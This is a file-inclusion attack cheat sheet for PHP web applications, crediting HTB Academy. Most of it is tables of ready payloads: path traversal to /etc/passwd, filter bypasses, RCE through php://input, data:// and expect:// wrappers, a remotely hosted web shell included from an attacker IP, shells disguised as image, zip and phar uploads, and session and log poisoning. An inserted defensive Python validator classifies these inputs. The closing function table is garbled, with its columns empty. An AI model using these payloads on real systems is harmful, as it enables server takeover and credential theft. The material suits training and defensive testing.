File Inclusion – Cheat Sheet

Local File Inclusion

Basic LFI

| Command | Description |
| --- | --- |
| `/index.php?language=/etc/passwd` | Basic LFI |
| `/index.php?language=../../../../etc/passwd` | LFI with path traversal |
| `/index.php?language=/../../../etc/passwd` | LFI with name prefix |
| `/index.php?language=./languages/../../../../etc/passwd` | LFI with approved path |

LFI Bypasses

| Command | Description |
| --- | --- |
| `/index.php?language=....//....//....//....//etc/passwd` | Bypass basic path traversal filter |
| `/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64` | Bypass filters with URL encoding |
| `/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]` | Bypass appended extension with path truncation (obsolete) |
| `/index.php?language=../../../../etc/passwd%00` | Bypass appended extension with null byte (obsolete) |
| `/index.php?language=php://filter/read=convert.base64-encode/resource=config` | Read PHP with base64 filter |

Remote Code Execution

PHP Wrappers

| Command | Description |
| --- | --- |
| `/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id` | RCE with data wrapper |
| `curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"` | RCE with input wrapper |
| `curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"` | RCE with expect wrapper |

RFI

| Command | Description |
| --- | --- |
| `echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>` | Host web shell |
| `/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id` | Include remote PHP web shell |

LFI + Upload

| Command | Description |
| --- | --- |
| `echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif` | Create malicious image |
| `/index.php?language=./profile_images/shell.gif&cmd=id` | RCE with malicious uploaded image |
| `echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php` | Create malicious zip archive ‘as jpg’ |
| `/index.php?language=zip://shell.zip%23shell.php&cmd=id` | RCE with malicious uploaded zip |
| `php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg` | Create malicious phar ‘as jpg’ |
| `/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id` | RCE with malicious uploaded phar |

Log Poisoning

| Command | Description |
| --- | --- |
| `/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd` | Read PHP session parameters |
| `/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E` | Poison PHP session with web shell |
| `/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id` | RCE through poisoned PHP session |
| `curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'` | Poison server log |
| `/index.php?language=/var/log/apache2/access.log&cmd=id` | RCE through poisoned server log |
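
From the defender's side, the `language` values listed above can be triaged by the reason a strict validator rejects them. This is an added example, not code from the original page or from HTB Academy; `BASE_DIR`, `ALLOWED`, `fully_decode` and `classify` are assumed names, and the directory and allow-list values are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumptions for this example: where includable files live and which
# language names the application really offers (constructed values).
BASE_DIR = "/var/www/html/languages"
ALLOWED = {"en", "es", "fr"}
SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # php://, data://, http:// ...

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so double-encoded input is seen in clear."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")

def classify(raw):
    """Return the reason `raw` is rejected, or None when it is acceptable."""
    try:
        value = fully_decode(raw)
    except ValueError:
        return "nested-encoding"
    if "\x00" in value:
        return "null-byte"
    if SCHEME.match(value):
        return "stream-wrapper"
    if "<?" in value:
        return "php-code"
    # Resolve the path the way the filesystem would; never strip "../",
    # because stripping is what turns "....//" into a traversal.
    resolved = posixpath.normpath(posixpath.join(BASE_DIR, value))
    if not resolved.startswith(BASE_DIR + "/"):
        return "outside-base-dir"
    if value not in ALLOWED:
        return "not-allow-listed"
    return None

if __name__ == "__main__":
    # Values copied from the page's tables, plus one legitimate value.
    for sample in ["en", "../../../../etc/passwd", "....//....//etc/passwd",
                   "../../../../etc/passwd%00", "expect://id",
                   "./languages/../../../../etc/passwd"]:
        print(f"{classify(sample)!s:18} {sample}")
```

The `....//` value is reported as `not-allow-listed` rather than `outside-base-dir` because it only becomes a traversal after a filter strips `../` from it; a validator that rejects instead of rewriting never creates that traversal.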

Misc

| Command | Description |
| --- | --- |
| `ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287` | Fuzz page parameters |
| `ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287` | Fuzz LFI payloads |
| `ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287` | Fuzz webroot path |
| `ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287` | Fuzz server configurations |

LFI Wordlists

- LFI-Jhaddix.txt
- Webroot path wordlist for Linux
- Webroot path wordlist for Windows
- Server configurations wordlist for Linux
- Server configurations wordlist for Windows

File Inclusion Functions

Function | Read Content | Execute | Remote URL
PHP
include()/include_once()
require()/require_once()
file_get_contents()
fopen()/file()
NodeJS
fs.readFile()
fs.sendFile()
res.render()
Java
include
import
.NET
@Html.Partial()
@Html.RemotePartial()
Response.WriteFile()
include
Reference: HTB Academy